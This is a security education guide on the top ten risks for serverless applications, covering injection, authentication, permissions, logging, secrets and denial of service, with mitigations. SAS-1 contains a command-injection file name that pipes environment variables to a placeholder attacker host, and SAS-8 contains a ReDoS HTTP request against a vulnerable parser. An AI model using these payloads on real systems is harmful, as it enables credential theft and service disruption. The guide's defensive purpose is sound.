The Ten Most Critical Risks for Serverless Applications v1.0

Preface

The “Serverless architectures Security Top 10” document is meant to serve as a security awareness and education guide. The document is curated and maintained by top industry practitioners and security researchers with vast experience in application security, cloud and serverless architectures.

As many organizations are still exploring serverless architectures, or just making their first steps in the serverless world, we believe that this guide is critical for their success in building robust, secure and reliable applications.

We urge all organizations to adopt this document and use it during the process of designing, developing and testing serverless applications in order to minimize security risks.

This document will be maintained and enhanced periodically based on input from the community, as well as research and analysis of the most common serverless architecture risks.

Lastly, it should be stressed that this document enumerates what are believed to be the current top risks, specific to serverless architectures. Readers are encouraged to always follow secure software design and development best practices.

Serverless Security Overview

Serverless architectures (also referred to as “FaaS” - Function as a Service) enable organizations to build and deploy software and services without maintaining or provisioning any physical or virtual servers. Applications built using serverless architectures are suitable for a wide range of services, and can scale elastically as cloud workloads grow.

From a software development perspective, organizations adopting serverless architectures can focus on core product functionality, and completely disregard the underlying operating system, application server or software runtime environment.

By developing applications using serverless architectures, you relieve yourself from the daunting task of constantly applying security patches for the underlying operating system and application servers – these tasks are now the responsibility of the serverless architecture provider.

The following image demonstrates the shared security responsibility model, adapted to serverless architectures:

Shared security responsibility model

In serverless architectures, the serverless provider is responsible for securing the data center, network, servers, operating systems and their configurations. However, application logic, code, data and application-layer configurations still need to be robust and resilient to attacks, which is the responsibility of application owners.

The comfort and elegance of serverless architectures is not without its drawbacks - serverless architectures introduce a new set of issues that must be taken into consideration when securing such applications:

Top 10

Before diving into the Serverless Architectures Security Top 10 list, it should be emphasized that the primary goal of this document is to provide assistance and education for organizations looking to adopt serverless. While the document provides information about what are believed to be the most prominent security risks for serverless architectures, it is by no means an exhaustive list. Readers are encouraged to follow other industry standards related to secure software design and development.

The data and research for this document are based on the following data sources:

The list is organized in order of criticality from SAS-1…10, where SAS-1 indicates the most critical risk, and SAS-10 the least critical risk.

SAS-1: Function Event-Data Injection

Injection flaws in applications are one of the most common risks to date and have been thoroughly covered in many secure coding best practice guides as well as in the OWASP Top 10 project. At a high level, injection flaws occur when untrusted input is passed directly to an interpreter and eventually gets executed or evaluated.

In the context of serverless architectures however, function event-data injections are not strictly limited to direct user input, such as input from a web API call. Most serverless architectures provide a multitude of event sources, which can trigger the execution of a serverless function. For example:

Serverless functions can consume input from each type of event source, and such event input might include different message formats, depending on the type of event and its source. The various parts of these event messages can contain attacker-controlled or otherwise dangerous inputs.

This rich set of event sources increases the potential attack surface and introduces complexities when attempting to protect serverless functions against event-data injections, especially since serverless architectures are not nearly as well-understood as web environments where developers know which message parts shouldn’t be trusted (e.g. GET/POST parameters, HTTP headers, and so forth).

The most common types of injection flaws in serverless architectures are presented below (in no particular order):

As an example, consider a job candidate CV filtering system, which receives emails with candidate CVs attached as PDF files. The system transforms the PDF file into text in order to perform text analytics. The transformation of the PDF file into text is done using a command line utility (pdftotext):

import email
import json
import os
import subprocess


def index(event, context):
    for record in event['Records']:
        sns_message = json.loads(record['Sns']['Message'])
        raw_email = sns_message['content']
        parser = email.message_from_string(raw_email)
        if parser.is_multipart():
            for email_msg in parser.get_payload():
                file_name = email_msg.get_filename()
                if not file_name:
                    continue
                if not file_name.endswith('.pdf'):
                    continue

                # export pdf attachment to /tmp
                pdf_file_path = os.path.join('/tmp', file_name)
                with open(pdf_file_path, "wb") as pdf_file:
                    pdf_file.write(email_msg.get_payload(decode=True))

                # extract text from pdf file
                # NOTE: the attacker-controlled file name is embedded in a
                # shell command and run with shell=True -- this is the
                # injection point discussed below
                cmd = "/var/task/lib/pdftotext {} -".format(pdf_file_path)

                pdf_content = subprocess.check_output(cmd, shell=True)

The developer of this serverless function assumes that users will provide legitimate PDF file names and does not perform any kind of sanity check on the incoming file name, except for the rudimentary check to make sure the file's extension is indeed '.pdf'. The file name is embedded directly into the shell command. This weakness allows a malicious user to inject shell commands as part of the PDF file name. For example, the following PDF file name, will leak all environment variables of the currently executing function:

foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
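A hardened version of the extraction step could avoid the shell entirely and reject suspicious attachment names. The sketch below is illustrative only (the allowlist regex and helper names are ours, not part of the original function):

```python
import os
import re
import subprocess

# Conservative allowlist for attachment names; anything else is rejected
SAFE_NAME = re.compile(r'^[\w .-]+\.pdf$')

def sanitize_pdf_name(file_name):
    """Reduce an attachment name to a safe basename, or raise."""
    base = os.path.basename(file_name)  # strip any directory components
    if not SAFE_NAME.match(base):
        raise ValueError("rejected attachment name: {!r}".format(file_name))
    return base

def pdf_to_text(pdf_file_path):
    # Passing an argument list with shell=False means the file name is
    # never interpreted by a shell, so ';', '|' and '&' have no effect
    return subprocess.check_output(
        ["/var/task/lib/pdftotext", pdf_file_path, "-"])
```

With this in place, the malicious file name shown above is rejected before it ever reaches `pdftotext`, and even a name that slipped through could not break out of its argument position.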

COMPARISON

DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS
Input sources and attack surface for injection-based vulnerabilities | Small set of input sources - injection-based attacks are thoroughly understood | Wide range of event triggers which provide a rich set of input sources and data formats. Injection-based attacks can be mounted in unexpected locations, many of which have yet to be studied properly
Injection-based attack surface complexity | Developers, architects and security practitioners are well versed in relevant attack surfaces related to injection-based vulnerabilities. For example - “HTTP GET/POST parameters or headers should never be trusted” | Serverless is still new; many developers, architects and security practitioners still don’t have the required expertise to understand the different attack vectors related to injection-based attacks
Security testing for injection-based attacks | Existing security testing solutions (DAST, SAST, IAST) provide good coverage for detecting injection-based vulnerabilities | Current DAST/SAST/IAST security testing tools are not adapted for testing injection-based vulnerabilities in serverless functions
Protections against injection-based attacks | Traditional security protections (firewalls, IPS, WAF, RASP) provide suitable protection coverage for injection-based attacks | Traditional security protections are not suitable for detecting and preventing injection-based attacks in serverless functions

MITIGATION

SAS-2: Broken Authentication

Since serverless architectures promote a microservices-oriented system design, applications built for such architectures may oftentimes contain dozens or even hundreds of distinct serverless functions, each with its own specific purpose.

These functions are weaved together and orchestrated to form the overall system logic. Some serverless functions may expose public web APIs, while others may serve as some sort of an internal glue between processes or other functions. In addition, some functions may consume events of different source types, such as cloud storage events, NoSQL database events, IoT device telemetry signals or even SMS message notifications.

Applying robust authentication schemes, which provide access control and protection to all relevant functions, event types and triggers is a complex undertaking, which may easily go awry if not done carefully.

As an example, imagine a serverless application, which exposes a set of public APIs, all of which enforce proper authentication. At the other end of the system, the application reads files from a cloud storage service, where file contents are consumed as input to certain serverless functions. If proper authentication is not applied on the cloud storage service, the system is exposing an unauthenticated rogue entry point, which was not taken into consideration during system design.

A weak authentication implementation might enable an attacker to bypass application logic and manipulate its flow, potentially executing functions and performing actions that were not supposed to be exposed to unauthenticated users.
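As a minimal illustration of function-level access control, the sketch below verifies a caller-supplied token in constant time. The `authToken` field name and the helper are hypothetical; real deployments should prefer the platform's built-in authentication facilities over hand-rolled checks like this:

```python
import hmac

def is_authorized(event, expected_token):
    """Constant-time check of a caller-supplied token.
    'authToken' is an assumed event field name, used purely for
    illustration; the expected token should come from a secrets
    manager, never from source code (see SAS-7)."""
    supplied = event.get("authToken", "")
    # An empty configured token means "deny everything" rather than
    # silently accepting unauthenticated callers
    return bool(expected_token) and hmac.compare_digest(supplied, expected_token)
```

`hmac.compare_digest` is used instead of `==` so the comparison does not leak timing information about how many leading characters matched.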

COMPARISON

DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS
Components requiring authentication | Authentication is applied using a single authentication provider on an entire domain/app. Simple to apply proper authentication | In many scenarios, each serverless function acts as a nano-service which requires its own authentication. Moreover, cloud services that are used by the serverless application also require their own authentication. As a result, the complexity of applying proper authentication grows tremendously.
Number of unique authentication schemes required | A single and consistent authentication scheme is applied to the entire application | Serverless applications that rely on multiple cloud services as event triggers sometimes require different authentication schemes for each cloud service
Tools for testing broken authentication | A wide range of brute-force authentication tools exist for testing web environments | Lack of proper tools for testing serverless authentication

MITIGATION

Developers should not build their own authentication schemes; instead, they should use the authentication facilities provided by the serverless environment or by the relevant runtime. For example:

In scenarios where interactive user authentication is not an option, such as with APIs, developers should use secure API keys, SAML assertions, client-side certificates or similar authentication standards.

If you are building an IoT ecosystem that uses Pub/Sub messaging for telemetry data or OTA firmware updates, pay attention to the following best practices:

In addition, organizations should use continuous security health check facilities that are provided by their serverless cloud provider, to monitor correct permissions and assess them against their corporate security policy:

Microsoft Azure provides similar capabilities through its security health monitoring facility, which is available in Azure Security Center.

SAS-3: Insecure Serverless Deployment Configuration

Cloud services in general, and serverless architectures in particular offer many customizations and configuration settings in order to adapt them for each specific need, task or surrounding environment. Some of these configuration settings have critical implications on the overall security posture of the application and should be given attention. The default settings provided by serverless architecture vendors might not always be suitable for your needs.

One extremely common weakness that affects many applications that use cloud-based storage is incorrectly configured cloud storage authentication/authorization.

Since one of the recommended best practice designs for serverless architectures is to make functions stateless, many applications built for serverless architectures rely on cloud storage infrastructure to store and persist data between executions.

In recent years, we have witnessed numerous incidents of insecure cloud storage configurations, which ended up exposing sensitive confidential corporate information to unauthorized users. To make things worse, in several cases, the sensitive data was also indexed by public search engines, making it easily available for everyone.

COMPARISON

DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS
Number of Internet-facing services requiring robust deployment configurations | Limited number of Internet-facing interfaces that require secure deployment configuration | Each cloud service and serverless function requires its own secure deployment configuration
Best practices for applying robust deployment configurations | Well known and thoroughly understood, especially for mainstream development frameworks | Vendor documentation and best practices exist. Industry standards and public guides on how to secure serverless environments are scarce
Automated tools for detecting insecure configurations | Plenty of open source and commercial scanners will pinpoint insecure deployment configurations | Limited set of tools for scanning and building secure serverless applications and deploying them securely

MITIGATION

In order to avoid sensitive data leakage from cloud storage infrastructure, many vendors now offer hardened cloud storage configurations, multi-factor authentication and encryption of data in transit and at rest. Organizations which make use of cloud storage should familiarize themselves with the available storage security controls provided by their cloud vendor.
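As an illustration of such a control, the sketch below evaluates whether an S3 bucket's "Block Public Access" configuration is fully enabled. The helper name is ours; the boto3 call shown in comments is a real S3 API but assumes AWS credentials, so it is not executed here:

```python
# The four S3 "Block Public Access" flags; all must be on for a bucket
# that should never serve data publicly
REQUIRED_FLAGS = ("BlockPublicAcls", "IgnorePublicAcls",
                  "BlockPublicPolicy", "RestrictPublicBuckets")

def is_locked_down(config):
    """True only if every Block Public Access flag is enabled."""
    return all(config.get(flag) is True for flag in REQUIRED_FLAGS)

# Fetching the live configuration would look roughly like this
# (assumes boto3 and AWS credentials; not executed here):
#
#   import boto3
#   s3 = boto3.client("s3")
#   resp = s3.get_public_access_block(Bucket="my-bucket")
#   print(is_locked_down(resp["PublicAccessBlockConfiguration"]))
```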

Here is a short list of relevant articles and guides on this topic:

In addition, we encourage organizations to make use of encryption key management service when encrypting data in cloud environments. Such services help with the secure creation and maintenance of encryption keys, and usually offer simple integrations with serverless architectures.

We recommend that your organization’s development and DevOps teams be well-versed in the different security-related configuration settings provided by your serverless architecture vendor, and will make you aware of these settings as much as possible.

Organizations should also apply continuous security configuration health monitoring, as described in the Mitigations section of SAS-2 in order to make sure that their environment is secured and follows corporate security policies.

SAS-4: Over-Privileged Function Permissions and Roles

Serverless applications should always follow the principle of "least privilege". This means that a serverless function should be given only those privileges that are essential in order to perform its intended logic.

As an example, consider the following AWS Lambda function, which receives data, and stores it in a DynamoDB table, using the DynamoDB put_item() method:

# ...
# store pdf content in DynamoDB table
dynamodb_client.put_item(TableName=TABLE_NAME,
                            Item={"email": {"S": parser['From']},
                                "subject": {"S": parser['Subject']},
                                "received": {"S": str(datetime.utcnow()).split('.')[0]},
                                "filename": {"S": file_name},
                                "requestid": {'S': context.aws_request_id},
                                "content": {'S': pdf_content.decode("utf-8")}})
# ...

While the function only puts items into the database, the developer made a mistake and assigned an over-permissive IAM role to the function, which can be seen in the following 'serverless.yml' file:

- Effect: Allow
  Action:
    - 'dynamodb:*'
  Resource:
    - 'arn:aws:dynamodb:us-east-1:****************:table/TABLE_NAME'

The appropriate, least-privileged role, should have been:

- Effect: Allow
  Action:
    - dynamodb:PutItem
  Resource: 'arn:aws:dynamodb:us-east-1:****************:table/TABLE_NAME'

Since serverless functions usually follow microservices concepts, many serverless applications contain dozens, hundreds or even thousands of functions. This in turn means that managing function permissions and roles quickly becomes a tedious task. In such scenarios, some organizations might find themselves forced to use a single permission model or security role for all functions, essentially granting each of them full access to all other components in the system.

In a system where all functions share the same set of over-privileged permissions, a vulnerability in a single function can eventually escalate into a system-wide security catastrophe.

COMPARISON

DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS
IAM, permissions and roles complexity | Simple to create and maintain - mostly applies to user roles rather than software components | Depending on the serverless vendor - might be more sophisticated or complex. Each serverless function should run with its own role and permission policy in order to reduce "blast radius"

MITIGATION

In order to contain a potential attack's "blast radius", it is recommended to apply Identity and Access Management (IAM) capabilities relevant to your platform, and make sure that each function has its own user-role, and that it runs with the least amount of privileges required to perform its task properly.
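A lightweight way to catch mistakes like the over-permissive 'dynamodb:*' role shown above is to scan policy statements for wildcards before deployment. The helper below is a hypothetical sketch, not a complete policy analyzer:

```python
def over_privileged(statements):
    """Flag IAM policy statements that allow wildcard actions or
    resources; these deserve a manual least-privilege review."""
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        # Both 'Action' and 'Resource' may be a string or a list in IAM JSON
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = stmt.get("Resource", [])
        resources = [resources] if isinstance(resources, str) else resources
        if any("*" in a for a in actions) or any("*" in r for r in resources):
            findings.append(stmt)
    return findings
```

Run against the two example policies above, only the 'dynamodb:*' statement would be flagged, while the 'dynamodb:PutItem' statement passes.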

Here are some relevant resources on this topic:

SAS-5: Inadequate Function Monitoring and Logging

Every cyber “intrusion kill chain” usually commences with a reconnaissance phase – this is the point in time in which attackers scout the application for weaknesses and potential vulnerabilities, which may later be used to exploit the system. Looking back at major successful cyber breaches, one key element that was always an advantage for the attackers, was the lack of real-time incident response, which was caused by failure to detect early signals of an attack. Many successful attacks could have been prevented if victim organizations had efficient and adequate real-time security event monitoring and logging.

One of the key aspects of serverless architectures is the fact that they reside in a cloud environment, outside of the organizational data center perimeter. As such, “on premise” or host-based security controls become irrelevant as a viable protection solution. This, in turn, means that any processes, tools and procedures developed for security event monitoring and logging become inadequate.

While many serverless architecture vendors provide extremely capable logging facilities, these logs in their basic/out-of-the-box configuration are not always suitable for the purpose of providing a full security event audit trail. In order to achieve adequate real-time security event monitoring with a proper audit trail, serverless developers and their DevOps teams are required to stitch together logging logic that will fit their organizational needs, for example:

  1. Collect real-time logs from the different serverless functions and cloud services
  2. Push these logs to a remote security information and event management (SIEM) system. This will often require the logs to be stored first in an intermediary cloud storage service.
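The first part of that stitched-together logic — emitting logs a SIEM can consume — can be as simple as writing one structured JSON line per security-relevant event. A minimal sketch (the function and field names are illustrative, not a standard):

```python
import json
import logging
from datetime import datetime

logger = logging.getLogger()
logger.setLevel(logging.INFO)

def security_event(event_type, request_id, detail):
    """Emit one JSON line per security-relevant event. In AWS Lambda,
    anything written through the standard logger lands in CloudWatch
    Logs, from where it can be forwarded to a SIEM."""
    record = {
        "timestamp": datetime.utcnow().isoformat() + "Z",
        "type": event_type,
        "request_id": request_id,
        "detail": detail,
    }
    line = json.dumps(record, sort_keys=True)
    logger.info(line)
    return line
```

Keeping every log line machine-parseable (one JSON object per line) is what makes downstream filtering and correlation in a SIEM practical.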

The SANS six categories of critical log information paper (link) recommends that the following log reports be collected:

COMPARISON

DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS
Available security logs | Many traditional security protections offer rich security event logs and integrations with SIEM products or log analysis tools | Since traditional security protections are irrelevant for serverless architectures, organizations can only rely on cloud provider’s logs, or build their own logging capabilities
Best practices for applying proper security logging | A wide range of documentation and best practice guides exist (e.g. SANS "The 6 Categories of Critical Log Information") | Most guides and documentation are provided by cloud vendors. Not many serverless-specific security logging best practice guides exist
Availability and maturity of log management and analysis tools | Traditional application logs have a wide range of log management and analysis tools and a mature industry behind them | Cloud security log management and analysis tools are still rather new. Serverless function-level log analysis tools are still not widely adopted
Application layer monitoring & analysis | Analyzing interactions between different application components can be done using a debugger/tracing utility | Understanding the interactions inside serverless-based applications might be overwhelming, especially in light of missing proper visualization tools for some environments

MITIGATION

Organizations adopting serverless architectures, are encouraged to augment log reports with serverless-specific information such as:

Additional information can be found in the following reference links:

Organizations are also encouraged to adopt serverless application logic/code runtime tracing and debugging facilities in order to gain better understanding of the overall system and data flow. For example:

SAS-6: Insecure 3rd Party Dependencies

In the general case, a serverless function should be a small piece of code that performs a single discrete task. Oftentimes, in order to perform this task, the serverless function will be required to depend on third party software packages, open source libraries and even consume 3rd party remote web services through API calls.

Keep in mind that even the most secure serverless function can become vulnerable when importing code from a vulnerable 3rd party dependency.

In recent years, many white papers and surveys were published on the topic of insecure 3rd party packages. A quick search in the MITRE CVE (Common Vulnerabilities and Exposures) database or similar projects demonstrates just how prevalent vulnerabilities are in packages and modules which are often used when developing serverless functions. For example:

  1. Known vulnerabilities in Node.js modules (link)
  2. Known vulnerabilities in Java technologies (link)
  3. Known vulnerabilities in Python related technologies (link)

The OWASP Top 10 project also includes a section on the use of components with known vulnerabilities.
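One small, concrete element of managing 3rd party risk is refusing unpinned dependencies, since exact version pins are what make it practical to match a deployment against CVE entries for known-vulnerable versions. A hypothetical sketch of such a pre-deployment check:

```python
def unpinned(requirement_lines):
    """Return requirement lines that are not pinned to an exact version.
    Exact pins ('package==1.2.3') are what allow a deployed function's
    dependencies to be audited against vulnerability databases."""
    findings = []
    for line in requirement_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comments
        if "==" not in line:
            findings.append(line)
    return findings
```

A check like this could run in CI against a `requirements.txt` file and fail the build when any dependency floats to an unaudited version.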

COMPARISON

No major differences

MITIGATION

Dealing with vulnerabilities in 3rd party components requires a well-defined process which includes:

SAS-7: Insecure Application Secrets Storage

As applications grow in size and complexity, there is a need to store and maintain "application secrets" – for example:

Another common mistake is to store these secrets in plain text, as environment variables. While environment variables are a useful way to persist data across serverless function executions, in some cases, such environment variables can leak and reach the wrong hands.

COMPARISON

DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS
Ease of storing secrets | In traditional applications, secrets can be stored in a single centralized configuration file (encrypted of course) or database | In serverless applications, each function is packaged separately. A single centralized configuration file cannot be used. This leads developers to use “creative” approaches like using environment variables, which if used insecurely, may leak information
Access control to sensitive data | It’s quite easy to apply proper access controls on sensitive data by using RBAC. For example - the person deploying the application is not exposed to application secrets | If secrets are stored using environment variables - it’s most likely that the people who deploy the application will have permissions to access the sensitive data
Use of key management systems | Organizations and InfoSec teams are used to working with corporate KMI systems | Many developers and InfoSec teams have yet to gain enough knowledge and experience with cloud based key management services

MITIGATION

It is critical that all application secrets be stored in secure encrypted storage and that encryption keys be maintained via a centralized encryption key management infrastructure or service. Such services are offered by most serverless architecture and cloud vendors, who also provide developers with secure APIs that can easily and seamlessly integrate into serverless environments.

If you decide to persist secrets in environment variables, make sure that data is always encrypted, and that decryption only takes place during function execution, using proper encryption key management.
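Decryption during function execution might look like the sketch below. The `DB_PASSWORD_ENCRYPTED` variable name is hypothetical, and the boto3 KMS call (a real API) is shown in comments because it requires live AWS credentials:

```python
import base64

def decode_ciphertext(env_value):
    """Environment variables hold text only, so an encrypted secret is
    typically stored base64-encoded; decode it back to bytes before
    handing it to the KMS API."""
    return base64.b64decode(env_value)

# Decrypting at function start-up would look roughly like this (assumes
# boto3, AWS credentials and a hypothetical DB_PASSWORD_ENCRYPTED
# variable; not executed here):
#
#   import os, boto3
#   kms = boto3.client("kms")
#   blob = decode_ciphertext(os.environ["DB_PASSWORD_ENCRYPTED"])
#   db_password = kms.decrypt(CiphertextBlob=blob)["Plaintext"].decode()
```

The important property is that the plaintext secret exists only in the function's memory during execution, never in the deployment configuration itself.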

Here are several reference links:

SAS-8: Denial of Service & Financial Resource Exhaustion

During the past decade, we have seen a dramatic increase in the frequency and volume of Denial of Service (DoS) attacks. Such attacks became one of the primary risks facing almost every company exposed to the Internet.

In 2016, a distributed Denial of Service (DDoS) attack reached a peak of one Terabit per second (1 Tbps). The attack supposedly originated from a botnet made up of millions of infected IoT devices.

While serverless architectures bring a promise of automated scalability and high availability, they do impose some limitations and issues which require attention.

As an example, in March 2018, PureSec's threat research team released a security advisory for a Node NPM package named 'AWS-Lambda-Multipart-Parser', which was found to be vulnerable to a ReDoS (Regular-Expression Denial of Service) attack vector. The vulnerability enables a malicious user to cause each AWS Lambda function which uses it to stall until it times out.

Sample Node.js (taken from AWS-Lambda-Multipart-Parser) code that is vulnerable to ReDoS:

module.exports.parse = (event, spotText) => {
    const boundary = getValueIgnoringKeyCase(event.headers, 'Content-Type').split('=')[1];
    const body = (event.isBase64Encoded ? Buffer.from(event.body, 'base64').toString('binary') : event.body)
        .split(new RegExp(boundary))
        .filter(item => item.match(/Content-Disposition/))

  1. The 'boundary' string sent by the client is extracted from the Content-Type header.
  2. The request's body is split based on the boundary string. Splitting of the body string is done using the JavaScript string split() method, which accepts either a string or a regular expression as the delimiter for splitting the string.
  3. The developer of the package chose to turn the boundary string into a regular expression object by calling the RegExp() constructor and using it inside the body’s split() method.
  4. Since both the boundary string, as well as the body of the request are under the full control of the client, a malicious user can craft a multipart/form-data request, in a way that will cause a ReDoS attack to occur.

An example of such a malicious request is presented below:

POST /app HTTP/1.1
Host: xxxxxxxxxxx.execute-api.us-east-1.amazonaws.com
Content-Length: 327
Content-Type: multipart/form-data; boundary=(.+)+$
Connection: keep-alive

(.+)+$
Content-Disposition: form-data; name="text"

PureSec
(.+)+$
Content-Disposition: form-data; name="file1"; filename="a.txt"
Content-Type: text/plain

Content of a.txt.

(.+)+$
Content-Disposition: form-data; name="file2"; filename="a.html"
Content-Type: text/html

<!DOCTYPE html><title>Content of a.html.</title>

(.+)+$

In this example, the boundary string was chosen to be the extremely inefficient regular expression (.+)+$. This boundary string, with a simple request body like the one provided above, will cause 100% CPU utilization for a very long period of time. In fact, on a MacBook Pro with a 3.5GHz Intel Core i7 CPU, the Node process did not finish parsing the body even after 10 minutes(!) of running. When testing against an AWS Lambda function which uses this node package, the function always hit the maximum timeout allowed by the platform.

An attacker may send numerous concurrent malicious requests to an AWS Lambda function which uses this package, until the concurrent executions limit is reached, and in turn, deny other users access to the application. An attacker may also push the Lambda function to “over-execute” for long periods of time, essentially inflating the monthly bill and inflicting a financial loss for the target organization.
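The vulnerable package is Node.js, but the underlying fix is language-agnostic: never let client-controlled input reach the regex engine as a pattern. A Python sketch of the idea:

```python
import re

def split_multipart(body, boundary):
    """Split a request body on a *literal* boundary string. re.escape
    neutralizes any regex metacharacters smuggled in through the
    Content-Type header, so a boundary such as '(.+)+$' cannot cause
    catastrophic backtracking. (Plain body.split(boundary) avoids the
    regex engine entirely and works just as well here.)"""
    parts = re.split(re.escape(boundary), body)
    return [p for p in parts if "Content-Disposition" in p]
```

With the boundary escaped, the malicious request above is split in linear time instead of stalling the function until it hits its timeout.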

More details are available in the PureSec blog

Serverless resource exhaustion: most serverless architecture vendors define default limits on the execution of serverless functions such as:

Depending on the type of limit and activity, poorly designed or configured applications may be abused in such a way that will eventually cause latency to become unacceptable or even render it unusable for other users.

AWS VPC IP address depletion: organizations that deploy AWS Lambda functions in VPC (Virtual Private Cloud) environments should also pay attention to the potential exhaustion of IP addresses in the VPC subnet. An attacker might cause a denial of service scenario by forcing more and more function instances to execute, and deplete the VPC subnet from available IP addresses.

Financial Resource Exhaustion: an attacker may push the serverless application to “over-execute” for long periods of time, essentially inflating the monthly bill and inflicting a financial loss for the target organization.
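One common control against both scenarios is reserving a bounded slice of the account's concurrency for Internet-facing functions. The budget arithmetic below is purely illustrative; the commented boto3 call (a real Lambda API) is not executed here:

```python
def concurrency_budget(account_limit, public_functions, public_share=0.5):
    """Naive illustrative budget: cap Internet-facing functions at
    `public_share` of the account's concurrency limit, so a request
    flood against them cannot starve the rest of the system or run
    up an unbounded bill."""
    budget = int(account_limit * public_share)
    per_function = max(1, budget // max(1, len(public_functions)))
    return {name: per_function for name in public_functions}

# Applying the budget with boto3 would look roughly like this
# (assumes AWS credentials; not executed here):
#
#   import boto3
#   aws_lambda = boto3.client("lambda")
#   for name, limit in concurrency_budget(1000, ["api-handler"]).items():
#       aws_lambda.put_function_concurrency(
#           FunctionName=name, ReservedConcurrentExecutions=limit)
```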

COMPARISON

DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS
Automatic scalability | Scalability is cumbersome and requires careful pre-planning | Serverless environments are provisioned automatically, on-demand. This means they can withstand high bandwidth attacks without any downtime
Execution limits | Standard network, disk and memory limits | In order to avoid excessive billing or to inflict damage on other tenants sharing the infrastructure, serverless applications use execution limits. Attackers may attempt to hit these limits and saturate the system
IP address depletion | N/A | When running AWS Lambda in VPCs, organizations should make sure they have enough IP addresses in the VPC subnet

MITIGATION

There are several mitigation and best-practice approaches for dealing with Denial of Service and Denial of Wallet attacks against serverless architectures. For example:

SAS-9: Functions Execution Flow Manipulation

Manipulation of application flow may help attackers to subvert application logic. Using this technique, an attacker may sometimes bypass access controls, elevate user privileges or even mount a Denial of Service attack.

Application flow manipulation is not unique to serverless architectures – it is a common problem in many types of software. However, serverless applications are unique in that they oftentimes follow the microservices design paradigm and contain many discrete functions, chained together in a specific order which implements the overall application logic.

In a system where multiple functions exist, and each function may invoke another function, the order of invocation might be critical for achieving the desired logic. Moreover, the design might assume that certain functions are only invoked under specific scenarios and only by authorized invokers.

Another relevant scenario, in which the multi-function invocation process might become a target for attackers, is serverless-based state machines, such as those offered by AWS Step Functions, Azure Logic Apps, Azure Durable Functions or IBM Cloud Functions Sequences.

Let’s examine the following serverless application, which calculates a cryptographic hash for files that are uploaded into a cloud storage bucket. The application logic is as follows:

The following image presents a schematic workflow of the application described above (figure: SAS-9 example).

This system design assumes that functions and events are invoked in the desired order – however, a malicious user might be able to manipulate the system in a couple of ways:

  1. If the cloud storage bucket does not enforce proper access controls, any user might be able to upload files directly into the bucket, bypassing the size sanity check, which is only enforced in Step 3. A malicious user might upload numerous huge files, essentially consuming all available system resources as defined by the system’s quota

  2. If the Pub/Sub messaging system does not enforce proper access controls on the relevant topic, any user might be able to publish numerous “file uploaded” messages, forcing the system to continuously execute the cryptographic file hashing function until all system resources are consumed

In both cases, an attacker might consume system resources until the defined quota is met, and then deny service from other system users. Another possible outcome can be a painful inflated monthly bill from the serverless architecture cloud vendor (also known as “Financial Resource Exhaustion”).
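Both manipulations succeed because the hashing function trusts that the earlier steps already ran. One defensive pattern is for each function to re-validate its own inputs rather than rely on upstream checks. The sketch below is a minimal illustration; the event shape, `TRUSTED_BUCKET` and `MAX_FILE_SIZE` are our own assumptions, not details from the application above:

```python
import hashlib

# Hypothetical limits and names, assumed for illustration only
MAX_FILE_SIZE = 10 * 1024 * 1024  # 10 MB
TRUSTED_BUCKET = "uploads-bucket"

def hash_handler(event):
    """Re-validate origin and size inside the hashing function itself,
    instead of trusting that earlier steps in the chain were executed."""
    record = event.get("record", {})
    if record.get("bucket") != TRUSTED_BUCKET:
        raise PermissionError("unexpected event source")
    if record.get("size", 0) > MAX_FILE_SIZE:
        raise ValueError("file exceeds size limit")
    data = record.get("body", b"")
    return hashlib.sha256(data).hexdigest()
```

With this in place, a message published directly to the topic (scenario 2) or an oversized direct upload (scenario 1) is rejected by the function itself, even though the upstream controls were bypassed.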

COMPARISON

| DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS |
| --- | --- | --- |
| Flow is enforced on... | Depends on the application type: could be user flow, web page flow or business logic flow | Similar to traditional applications (depending on the front end); however, serverless functions may also require flow enforcement – especially in applications that mimic state machines using functions |

MITIGATION

There is no simple one-size-fits-all solution for this issue. The most robust approach for avoiding function execution flow manipulations is to design the system without making any assumptions about legitimate invocation flow. Make sure that proper access controls and permissions are set for each function, and where applicable, use a robust application state management facility.
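Where a state management facility is not available, one way to avoid trusting the invocation order is to make each function prove that its predecessor ran, for example by passing along an HMAC-signed step token. This is a sketch under our own assumptions (the shared key, the `FLOW` step names and both helpers are hypothetical, not part of any provider API):

```python
import hmac
import hashlib

# Illustrative assumptions: in practice the key would come from a
# secrets manager, and steps would map to real functions in the chain
SECRET = b"shared-signing-key"
FLOW = ["upload", "size_check", "hash"]

def issue_token(completed_step: str) -> str:
    # Each function signs the name of the step it just completed
    return hmac.new(SECRET, completed_step.encode(), hashlib.sha256).hexdigest()

def require_previous(step: str, token: str) -> None:
    """Refuse to run unless the caller proves the preceding step ran."""
    idx = FLOW.index(step)
    if idx == 0:
        return  # the first step has no predecessor
    expected = issue_token(FLOW[idx - 1])
    if not hmac.compare_digest(expected, token):
        raise PermissionError(f"step '{step}' invoked out of order")
```

A forged or missing token stops the chain, so invoking the hashing step directly (as in the scenarios above) fails even if the attacker can reach the function. Managed state machines such as AWS Step Functions provide this ordering guarantee natively and are usually preferable when available.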

SAS-10: Improper Exception Handling and Verbose Error Messages

At the time of writing, the available options for performing line-by-line debugging of serverless-based applications are rather limited and more complex than the debugging capabilities available when developing standard applications. This is especially true when the serverless function uses cloud-based services that are not available when debugging the code locally.

This leads some developers to rely on verbose error messages, enable debugging through environment variables, and eventually forget to clean up the code when moving it to the production environment.

Verbose error messages, such as stack traces or syntax errors, that are exposed to end users may reveal details about the internal logic of the serverless function, and in turn expose potential weaknesses and flaws, or even leak sensitive data.

COMPARISON

| DIFFERENTIATING FACTOR | TRADITIONAL APPLICATIONS | SERVERLESS APPLICATIONS |
| --- | --- | --- |
